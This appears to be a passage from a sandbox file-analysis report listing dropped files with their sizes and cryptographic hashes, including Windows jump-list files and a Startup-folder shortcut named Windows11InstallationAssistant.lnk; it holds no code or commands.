SHA196e00b5f3170d19d173e62b97c1691fac8edfb98
SHA256c72184932dd0541095be4827e5f86b3db735cfc651f04b50a1cc783d9037d75d
SHA51213385b98377cb664907a5189cbf63f575c86b5b705df2a458ae21c6fd63f6cbf77451e8f17b22af8921a3342f31445278cb8450e1cc58fe33eecffe81e56cdda
-
Filesize
29KB
MD531c5a8d7f0d900bfff09d437a7457478
SHA1c32f7abbc47949c340a2136bb8cc4787f05b1eff
SHA25689da44ebaa36a31740f9dbc585cefc3f55cf725f7d8d745b44ba259f0a1d8455
SHA5120089a7e5e0c3d7b8a226775f30983e901b323846d5263366672390ebbbd9212bd72bdb87c7baeeb09c6438317a66f5ccfc20cd898579190e6bb7579dd1cd158a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
11KB
MD5c87a407a6decc862e3132efc8ab504c9
SHA120cd713fa491119aabfd25a7cce7a8209098f903
SHA256439de9f662754bbcfc211658ce3f1c1730e85df199ed1e067940e28831d2c758
SHA5128bed0ca582ca5b46f0c6922995343388df0d84d063512308d3f58c31da1811cb2c47b87be0ce5de4a1fb8ce14f89f8f3197f31bb0ca989fa159514f6751e1832
-
Filesize
10KB
MD5bdb4dcbcec51d9ee1afee83221921fee
SHA121d56a9334238297d1a09aba46043cc36c9e2d3c
SHA2569e5d8505b986e40cce00707180334fead34c0c3b590c458305de89e4bbc85f75
SHA512cad20e6355cfe1e42a4ee7f5350a033ec79b8ed2689d8c6fa11bb1c3ae2a99425f03d95312ed9daf5c2543fc7ce38239fca41700cbecbc02a007a669ffd81fa5
-
Filesize
5KB
MD53886aae8ae30f288363ce4d2ac4f81c2
SHA119441c886b57ed9f4650f614f0d93501d0a33e40
SHA25637f10f3d46a2886cac6169a398e91dd8cd0cfd06a7b6812e1afb68c4c031b9fd
SHA512b37aa26a5324723d9b8a7b919c3727565a1e1974ba1316093b59dbe4a75f5e0773288894d7abb403d65688e0e3f29ef4b48af7a8048e64fe36199bf8d371fb31
-
Filesize
288KB
MD59025ce192ba676569c935459d0e1e249
SHA11c9754ccf27e5bcf4bf4d1fb55e5485c12008d31
SHA256d499f5213314049a8f8a628dcccb550758a8bd25639bd7c05e776c4ff7692c0c
SHA5127de59dd50602e05f301ee84539a93a61c49ab26ac3946756414529414e23ffb46d9b2fda64c3a43e712e7b75ee5fe6b6a4e4847931dda5cac206948c8ac989a9
-
Filesize
3.1MB
MD540627c5fe58bb5a60606e5be621af052
SHA1c21ec14767478d0e4bd1184ad6c2c280e2d1342f
SHA256bd4cbba2f23b512fad5b0c84d2e9502e4bfea75cac78482d22036968e8224b42
SHA512e418ed7c9768a4237622be7a53b761a45ca4d4cf37643fcfdf9cb2f200a95fc904b213fb1a37befb86e6ff93ae3c5ff0f39243305789236d4031e017ec99085d
-
Filesize
748B
MD522a845995279c76177c613100a58d134
SHA15cc94610bcdba7b0d514b711852a6cdb56db3ae1
SHA256ca30adad79ccd83b3dc79f26a58c1552559176f8a271237c6d4d7ccf307920c0
SHA5120a4a3eb765847ab66e847bb83202ee8ad5d8591659a8be9e3ed4b6863f3aac28f9d4f6e2d4ca5c5efe800cfe30d471122b2f96807c2735dde5c6ade16c064cad
-
Filesize
520B
MD56f0d036f6681bac6fd742591ddc62808
SHA12e518c19ec29b7a3a69cd9d4c120d3b88d71102b
SHA256ce8f0822d428e39157fc6ed433b8da7fa7ce62ece2c73bed9930d50f7cb41f24
SHA5128aeb47d8a15ab62a1a6e23f93a916f361703d2ac64a302d2364d40de016dc2167d653ca905197d81e4c578fdbb81eb88a22c7cd81abe08756ec86dda6a44aaf6
-
Filesize
135KB
MD578c269b72f5b1d9bd4654cef3fb4a986
SHA1c44db702175e2d474e3221a0de14f01c1f35129b
SHA256ace03b12b8763bd8567425f288ded8f8f0d9acd62f81de17414bd300d21820ab
SHA512bc9abf69debc967df59e16491ec533ab59b997d8ea89d7ebc1ba0a04b319d5f3746cd9e22b8b2c10b4ce655fb5a813be08214e142e97107cb07222f7dc19bee5
-
Filesize
764KB
MD5408dd6ade80f2ebbc2e5470a1fb506f1
SHA1e00293ce0eb534874efd615ae590cf6aa3858ba4
SHA2564c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71
SHA5124dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0
-
Filesize
96KB
MD540f3eb83cc9d4cdb0ad82bd5ff2fb824
SHA1d6582ba879235049134fa9a351ca8f0f785d8835
SHA256cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0
SHA512cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2
-
Filesize
14KB
MD56e385672eb1a43fbb98a999a115aef59
SHA18fd6499f2f2f847b6e104793bd5c5267e83d5855
SHA256c7f9605f9bb601c465d5f3ad7e82f310a3dc2530b51c079f2df12f6b54f34f84
SHA51273ddf9eccda70dc366631a1098766b418f39749bd0259ccb5d06939ec111a1440f7c164007f13bde92d7f9f3b83625d06919e2423da29797bbdc6e79d0f45a9e
-
Filesize
4.9MB
MD5ccdde9cc37916d92365eca66f652c422
SHA14a5ac27e151f695bb2c3db1d81484fb4d22c6e88
SHA2566e0b8d11701537039d645d93e5668e4707d8405310ff84b453f533e60b8b0ad9
SHA5128f416c23545d144a4b5d0796a41b3ec7c9a228d782cab0d105cfdeb1e163f2e865c62392dcc2cac5444bb54e5db7228a903b4de8ce9c9bf0cf2eba2a9be20d9a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize6KB
MD5cc01fedd976dca806b8041b28d58b1a2
SHA16ef20eef3325384fac647495b4d24d9402496de2
SHA256fbefbe77b5d69d8a45d63019d2f2d92f149ca5a07dcaf4a61041f20a5df740f3
SHA512bc910406d58bf6cc9598e1505b498d4286398492d4a51eff12028f615ceb5b6da0c0dafb10ad3136be698f60397d607011d2cc2577774bda7f359095ee4a5b6e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize6KB
MD5dbd0e73e9d56cf55a65703804237b8bd
SHA1fc8147a150a3490caf474bb4f6be1dedd9244d21
SHA2563a72a71088fd433709bd04feac6870bad7ea419226245d60606c47a20318333c
SHA5120404671c29cfedf3599eb11ea5c512a9b5fa81a36cde4cc58766c15af0f8854dccb8abd2d7351a6d4e4bf00910175ce250158e76cbb08163e178224ea2d8882d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize6KB
MD51929a30a273d0d72ef691ae9aae56a19
SHA1e4013eda41e58edddfe1e3e18edac6c5304bbc16
SHA256faf9b0285dc23812a65bd084a1c1d42f55000af735c47a9061225d7f6e5bdf40
SHA5122f435fd851f8e530facd65770fdc3e374f7788dfa758c832eb8b5176e792ec01c32ac3371b27c3b45b368c1b438b56e2b6b94a3e34bb5e3e6e8216e41f63a31f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize6KB
MD5a95ab0f52da4fea8d2fc07dc1424e3b3
SHA1b2530fc1aa315b043f433b16d4800ed3c0f48c9b
SHA256be08ce5442138a4858625a8506272c11ce0306f0b3d1a107755ee1037dd2bed7
SHA51221dc3eadf72ee06551c0c6501ff68d56eca5a3c96a47d9fe769da117ca3a911ddfc4c6abe8f6ac5d5683239fffeb15038431c40a9e2dd7736699b0477d1b8b57
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize6KB
MD544ffe2bf9342f010ab716e7b0def477a
SHA1220883a35211c91579d3f5fcbae518c4aa4805a6
SHA2561ece58e560f9d2d7abb644ab12234b102c9dffc4a18ee5fb4f62218f9a906d0b
SHA5120f261fdc66074e14ee2b89b67354fd79b568380697fbb1743acd61f4d013c9652f8217a36d7763fde3edb4aad4b803f17b8939771ec9e12f3ba87841c6ae4ba1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize6KB
MD529ea5a6dcf77dce7c49b0e4024ca405f
SHA174f244738fa71dc8277335df818e948783edd5ae
SHA2566a15d52ff448326ab9b290e60c80262af118f5b5bb3b34349b9dca1f3ac45e58
SHA5120b50b0278c92e549110afedfc968db74b281efe78e3684c56d72bf609b7fed7c6d48b296d5b9706e5540268e1967b20677c274adc21171f9e1de1c4fff90b37c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize6KB
MD593cdbe0e6c1df80fa22c120f8c69b8c6
SHA1bd436c9dc25544376b12551f49d2084197f38119
SHA2560b2f5bb87372b51ebb75c4b6f9662e1dec0cbec909ff537348a3af4faa506e71
SHA51294d8baa7f32fe19541f92dd285293aed06d512554b5d3a01f728f933572bf5af84f028f2fd0e27f9101d0f7f08c10bfac80beb5996e3f1177a5b98803d238fe7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize6KB
MD5e6715c0ab4c24c5abc960a22692aef15
SHA1a561bdf85293e36f512d8748c5dc8d585922b423
SHA2561b813abfe6905cda42a9231b4ebc20eda99ee2d6b7cee3e357104be0493a915d
SHA512eb4222cf1b14a011649b58d5687cb77248021f5fd57c72e83dd98bea30ecb20f97e6fd27ceb44928a0396669f599e3f781101d553c1107497987435cab51fca0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize6KB
MD585ae502287d00cd1c8c2f8a647e8a443
SHA1f6b415dcdd8f0769657b7c4415f51df6bdb714d0
SHA25652b985751035f16bfe48694eb912e5e5094fb294b3e89ebd6bd502115ba3e098
SHA512854a211a60d9b0004e9b8e2b1d2a9d91ec1d276e2c1898f5b73b24571476d0568f6a322548fdea74fc52fbe503d0dfc886764151bf3dfcf47bf28710e1a71189
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize6KB
MD5a64e2bf847968c3ebb0352d94ebc31bb
SHA14393503722001bacc9e530563fb6df1a1fa2290d
SHA2567ea0c8928258bff6059853248fcd29e072164ae919bd212836071068a667d884
SHA51254a60607f0fbc938c6cf3da171c18089c1465f1ccee30d97b352a6799f6417f4fa088fd8eda45e06037bf62cdeef707d72da1073e57b5883b3b4acb7705dfb5e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows11InstallationAssistant.lnk
Filesize1KB
MD532d2f357b0c753c9f2ec48a46ace87a1
SHA19d39ab688703afcb085e3185b0371117445622dd
SHA25633c6d377b2859272f50d96a7f8d7ba5bcb61bc0078eb333bdd023bd3895f98fe
SHA512e5343d78d2cb68b70517893ce3f4ca3778dd83926cc7b403df320469ab58bb02dcaf3ec437db58f0cb43f667f95f2eb4d4382d1465193cbd8e3052bd0460c041
-
Filesize
8.0MB
MD5e9f5799bcca4695afee82c0781242577
SHA1240bf1ae93f432aef2a05daeed3299d12bd7e6f8
SHA256dc24023611f63b84f4fddc095a1417518ae1972743dbbff014d31218770e48d6
SHA512b1551197efd2209b633ed0ca581332a1871416a541a64ef99dffd75c7a082b65c4fa3abdc15b84ff92cdac224c6616a40c17b33c268df3f6244f0b2c920b143c
-
Filesize
1KB
MD53d19ae65bc53c6aa833b82ca7fa61cd4
SHA1a3b94891864abdc9a8fec3022b3df060923ead46
SHA256fcdc3e57b51ed726d90fca4aa19ba09e2bdb7a04fd573bf854465883aa326e14
SHA5128e4e3b8efa9d05497a27e79b82238bd9864ce3e1226ade8358491697173e19f6a12f2f181c64b481cd211ec5231804e9c683d72e5d0cf74208b7adb7a80f6e9c
-
Filesize
1KB
MD5aba235b54047e7cb084612bb4da90487
SHA1d82ce896f26da05719a159028c18a275ff7304c7
SHA256d1437a37ed2e78fe4c82174a1981631a4710f023b4726f7431f7f3a02e209be0
SHA512ee997aa717057b01d7ee0aaaddc05925caf4fc7a99f917c7a3b8ee472b926523501cdf26c1315b38463b368a329ec8f1bb47a22f07883b85bd183bbc39d7a7d9
-
Filesize
1KB
MD51da12c8dc6dee2cf35786d7214c7c5cd
SHA1fe81b4162636a4f8ccc16d7ad8dd3e5c8165bc63
SHA25618396e55e85d07cc36c223bf7f30e3e2e2cb171e89313b622a6df041f1095333
SHA512b465e1c2b1bd4ceb0a2f195c0666c6d4c3ec4b55131be652bfbdee8dff8c9b4f6f52b95ab7562b5ff669dd43e03996453563fc8a3a04ad9f33d141c1bf19f180
-
Filesize
1KB
MD5dae09e71a424a796e57972976432802e
SHA13190c52ba6422c5421f53b12d016cbaeaeafc14e
SHA256f89d667e7c4a1a85bba63ac8fb4eb4d55d442a323011f222d39b92308b4ecb62
SHA512e96a6d8645ec1ea926d154c6ccb1ef6bf172e74a2301624d9de84200bb4c0d7fbe0404b7a0d362c9e1151889d18576bf1c17007b4260cf4b60d018b5506e0f7c
-
Filesize
1KB
MD56193636e0937f9aa8d1a51760700fe36
SHA10f31660fd9f0181c977d392c1af12d9ff4295f3b
SHA256a073d240b848ae572360eeb4a59493078121dd38e827152bb60b44b9b88d4000
SHA512899572343acb5a95fcca3325e6b0db1eaa759c8bfe05556cb1d6b3da7498c6e46e91d5a31dae067aaafeb37f776f601efe69481c1125cf1db57cd80d6034d544
-
Filesize
1KB
MD59845dd85124401f5a66f558a8aca99b0
SHA1bd1e578ff26e1f8ceac98a8e334cab116358ff1b
SHA256bd67f1c4cbd53fab37860e3039eb9f0d36f8d3d699c012ed73e0103300073eef
SHA512f6141adc9e43ea3fb70e63c38be2c5f49c7d68dd2121a5ff866665429cc78fbc11e6df9c9766901d3f6bdf7fa2dde43af6e46bf364fd9740d80268fdf59df33f
-
Filesize
1KB
MD5a61ea7aef83b5cf13a79f3261b754299
SHA11b145d66880360213d9ebf1593aeb9146711500b
SHA256fc9d51689428140dd4cee3c9d5e7a85dbe2d38f8cbb182a453258de4866b533b
SHA5123c73458b4532ccabf3996923d3d825626b5505b8f180e727d86fd7667b844e4022eced25c20507262182113d550f21a2b0f6d5acf2896a37e9ee894495ed33a4
-
Filesize
1KB
MD565b958df30a0d5264a6960b43d1ba803
SHA1c5486386da0209c11d769be8db9a250cf91761a9
SHA256f1d5f0d18e1caea663ebd7a953904bf783ae1eaafa25f7a0fbec1a36d47eb55a
SHA5127845885e7c2d57f44f61daaec63b33fec69c6e712b79286fd33a295a2408813c48d68d7bc70ed144f87e30644b3e214eaaaa1ebb9e70a0af2c509c5d6cfe269d
-
Filesize
1KB
MD593c55af47cde7b357a50adeafa4b7e0b
SHA1afff2bdbe8b05cd4aa3a93062673d8798e474d7b
SHA256f21a0e37e0d2ba27fdf62153e591f51cb40aa78007c4f86b38ed116bd4cb70a2
SHA512f407b6d54fbe6afc119d0fcecf1201ad785ee05f3c791150343f0cefbffec8b92b34f371ebb6b5d8d0e47b0ff3a6ad51dcf150d6ce6bb77eaef9c481a5fb1226
-
Filesize
1KB
MD530153c993d05eba1f074f5426d06d6b6
SHA16111f38cff97f5f315c84929030e16d5e8895c4c
SHA2560da79bd7b13e8ede21f933b07dc131f5c6660c6dea05abd213c5210639b53527
SHA51223a262bf715090bf0011cc4a3eb859ed21ab1fd792b6d39ae0c29892afce3acacfae2be9aa3e1df0006def44d6b3fd2bd5755807e58efc819f29ef2cfdf8ab42
-
Filesize
1KB
MD537266ef3483bf46b93fe8bd1b5ef0be0
SHA15523aeeaef268f04d5e28ba2333395835078b9e2
SHA256a7958ee25a7cb12da3b75b0f1108d3d8063d373846d5ec4a1d793b696a568ddb
SHA512ee3c1971740413c0a123c437b6ffaaa45c2bc487064f3f79a3a74f0e9118e66ed7d8b5e93dcf6a0656c3721dec217b7122f71d0c7663a1ee28943b3f2fe11675
-
Filesize
1KB
MD5ceffd1a4bd82dfd9ffcab66c348da323
SHA1bfabe81531cadb591370eb6eaa5ade0ec8974e0c
SHA25616108ca4ccf2d9b1f45e7eac33aa422200997465c8dac3ec8f8347aec5c51dde
SHA512e0fdfcdc72bb0b4194d4e994e04b528e67ab5b95a9d346da74a0f0e1d0aefa79d2a547892eacd29d5c9fbc4c8ffced4bd9dccdee8bee02c9d8e5ad5c6710e7a8
-
Filesize
1KB
MD560c4a7e2cf4efaaa5dd1faf837dcbe8d
SHA11c21c8a9f1834affe9017e1843fa4bf8f8011624
SHA2561152acdf6b94a5d48d56b5cb78199be434106a5d223bbdce65c6a3d681296ff1
SHA51230043e461f3e1f9a19d24dc582d171a7b50cb9c60fbe03ece12eedbed3d41b745714327706c3e93265aab98f206fc144a7e03904465fcb19d9a681b8639a1e09
-
Filesize
1KB
MD5bb20ef9c5e8647b19e7af26229108c99
SHA1ff642a69365bdf05364872d951ff5bf9c403a804
SHA256ef63978031b34cdc4613db378395ce28f3cc7d35f318ac62f730f90edf181f44
SHA512914ace2948982c607c61293d79bef662446b5227eac258abfdf601ef8eb968680ba5ceca1319d0c32064c21ded5812c0b3319642749083d52ea8905da82bc22f
-
Filesize
1KB
MD524ec3a554f64015482f0960b410d8bd0
SHA1475ff8b22800c59a3f7446e693eac5292532f39e
SHA2561692df1cc5b0f58b7df9ab78821a06196b0466683983c8949cf6b01ef12b0df2
SHA512977a9a1984c06800487eef736a1a9061acb6f62c6aa66dba919339007aa973bbf9a10e51482bdb59e14ff646b2c85c6198e59211d116b148fb7ca1d53415f3e4
-
Filesize
1KB
MD5710e85ee4c7bf73f9c8e8b0e0224af55
SHA161f0aae0865344c6f799cf489c02ec64cc50bdd3
SHA256e5c6683bb998f821dc813fe05eed0e90a73dcc64589238370871ec2cf1e12246
SHA5125221fd39ceae5a40393884d03122e3023e8b8b46808ce47ced7e6bc416838e539109bed81c3f3bf1cbe9034a86cef08c3f3f791a04b5dc7762af0e5a9726fc27
-
Filesize
10KB
MD5dee7acbdbf3f448057dae93e28514690
SHA1ae56d802230bc13e7663be388781d7d1aa1ef3d0
SHA2565ec9a6efe3c3451a967335bf7d7bcb2f916fc8ba81c0b1118018d079fbffb5ec
SHA51277cdd3ab66e49267907e3711ab7878469976ba677a683bead7d5e63353b03164345aef0ca0dd5d124488eca7cfef1f64ebde363d76596ef882cb2c56e1f41504
-
Filesize
208B
MD52e2fa9827b9d476133f122be9012408c
SHA13a3d0d1135f95227693a46a110312a3c1a177c51
SHA256184fb09c2a02a1e5d23c9abe64affd866a919b7b287622069371716223f3b1b6
SHA5122e4a431fca5dada81cb22af865b122635b9b93e89b3948e86a2d6dd0c4b8eadbcf594ea1fb817818738468a831ecac75d7247d226d4ce901a9aaec66bc2c0e89
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e